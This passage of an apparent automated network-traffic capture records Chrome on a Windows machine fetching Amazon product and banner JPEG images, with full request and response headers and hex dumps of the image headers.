                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 26988
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: P2lTBTLvXJ_xe0rZJrd8_dV_1YxdLktwKWBi4_vv108N49JZU_81sA==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1870INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 84 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 02 01 08 10 00 02 01 03 03 03 02 04 02 09 05 01 00 00 00 00 00 01 02 03 04 11 05 21 31 12 41 51 22 71 13 61 81 a1 06 91 07 14 16 32 42 52 62 72 92 15 33 b1 c1 c2 d1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQ"qa2BRbr3


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        75192.168.2.44985118.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC448OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3363
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 1987ef65-1ee8-450b-9a51-89452820f19d
                                                                                                                                                                                                        Date: Sun, 14 Jul 2024 13:36:25 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-144,/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x
                                                                                                                                                                                                        Expires: Sat, 09 Jul 2044 13:36:25 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-144 /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 9840468fd7f0cd4b97907be5f049f14a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 2764900
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: BrhOXYPIhAHhIUTfZatq6YzjwfHoZmsWmWRMiQwFNbuSjop-SwC0fg==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC3363INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 a1 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 06 07 08 01 03 05 02 09 10 00 01 03 03 01 03 09 04 07 06 07 01 00 00 00 00 01 00 02 03 04 05 11 12 06 21 41 07 13 22 31 32 51 71 81 92 14 61 91 b1 15 16 42 54 72 93 d1 17 23 52
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!A"12QqaBTr#R


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        76192.168.2.44985018.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC378OUTGET /images/I/317JiGToz-L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC840INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4405
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 4af2b9e4-b318-4db2-990f-7a852cc8a06a
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 09:40:50 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 13 Oct 2020 22:50:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-142,/images/I/317JiGToz-L
                                                                                                                                                                                                        Expires: Wed, 10 Aug 2044 09:40:50 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-142 /images/I/317JiGToz-L
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 a9717fb92179a05f5da85fabc586e750.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 12429
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: lowDaK3xF6Z1jN90DQ8vykRUR8MqYa5nSP-B3FUxERxbY7vtnY2YPQ==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC4405INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 08 02 01 09 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 01 05 02 03 04 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        77192.168.2.44985418.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC434OUTGET /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 8552
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 31766cf3-5849-490e-a3ae-ae5e3ea2717b
                                                                                                                                                                                                        Date: Fri, 02 Aug 2024 07:53:22 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Fri, 02 Aug 2024 07:45:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-197,/images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN
                                                                                                                                                                                                        Expires: Thu, 28 Jul 2044 07:53:22 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-197 /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 ef04b5bd9d63162000acde84eaab4f9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 200086
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: xCkhaREansxnRuw8MrFpcZGTSNxrbTPpiPyUZPT2VFG5FYUGvn0T2A==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC8552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 01 04 05 06 08 09 03 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea e0 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*0{"6


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        78192.168.2.44985518.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC457OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC932INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3580
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 9162dde5-d052-4868-a326-3d1d6a7331fb
                                                                                                                                                                                                        Date: Thu, 08 Aug 2024 13:05:11 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-609,/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Wed, 03 Aug 2044 13:05:11 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-609 /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 039ee779486557ccf22d128d6266e00e.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 36642
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: 3S6pbU70CoMcUJQWwbjh90vusZo--Q_21-BXKYU5EbkK6d-nkL6VQA==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC3580INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8e 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 07 06 08 03 04 09 01 02 10 00 02 01 03 03 02 03 06 04 03 07 05 01 00 00 00 01 02 03 00 04 11 05 12 21 06 31 13 22 51 07 14 41 61 71 91 08 32 81 a1 15 33 b1 16 23 42 62 72 92 93
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"QAaq23#Bbr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        79192.168.2.44986118.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC452OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC924INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2459
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 41249573-4b97-4c5b-ab5b-44f12ac4342d
                                                                                                                                                                                                        Date: Fri, 14 Jun 2024 02:08:09 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-733,/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x
                                                                                                                                                                                                        Expires: Thu, 09 Jun 2044 02:08:09 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-733 /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 97f993f9d41d16f3f36b8c466857e2d6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 4175228
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: eI3pqRTXJgnjSPc8oI9G8nT566ZrGWhVOX7FOft1Nagi8v_65A2Mmg==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC2459INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 8d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 09 03 01 02 10 00 01 03 02 03 03 06 0b 06 05 05 01 00 00 00 00 01 00 02 03 04 11 05 12 21 06 13 31 22 32 41 51 91 b1 07 17 33 42 55 61 71 72 73 93 a1 08 34 52 62 81
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"2AQ3BUaqrs4Rb


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        80192.168.2.44985218.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC378OUTGET /images/I/41xkTNTvpwL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 6530
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: e8608d92-a0ea-4356-936e-f996c0b8c369
                                                                                                                                                                                                        Date: Mon, 05 Aug 2024 16:27:40 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sun, 14 Apr 2024 07:26:48 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-847,/images/I/41xkTNTvpwL
                                                                                                                                                                                                        Expires: Sun, 31 Jul 2044 16:27:40 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-847 /images/I/41xkTNTvpwL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Via: 1.1 9c0ce977a13f3d9bbc6eed6540faf728.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 126067
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: Vud6H-Xdd5QB2BnnZsHRCu5MFDqXeLv5DnJEPU_2jJgGY_OqoL32nQ==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC6530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 01 01 01 00 03 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 20 00 00 00 02 19 30 64 73 87
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5X 0ds


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        81192.168.2.44985318.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC378OUTGET /images/I/41gRz4miKkL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 7620
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: f0631495-3463-484a-a206-edd015947bc7
                                                                                                                                                                                                        Date: Thu, 08 Aug 2024 16:34:16 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Jul 2024 04:04:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-228,/images/I/41gRz4miKkL
                                                                                                                                                                                                        Expires: Wed, 03 Aug 2044 16:34:16 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-228 /images/I/41gRz4miKkL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 cb0d3a2bdc5300e2d139e111e94efe5a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 269308
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: VRd2N1NShOF4Fr0Byu7-uo_nHv3pkB4qxL4p2Gk3Tx84w5z4-x_d0g==
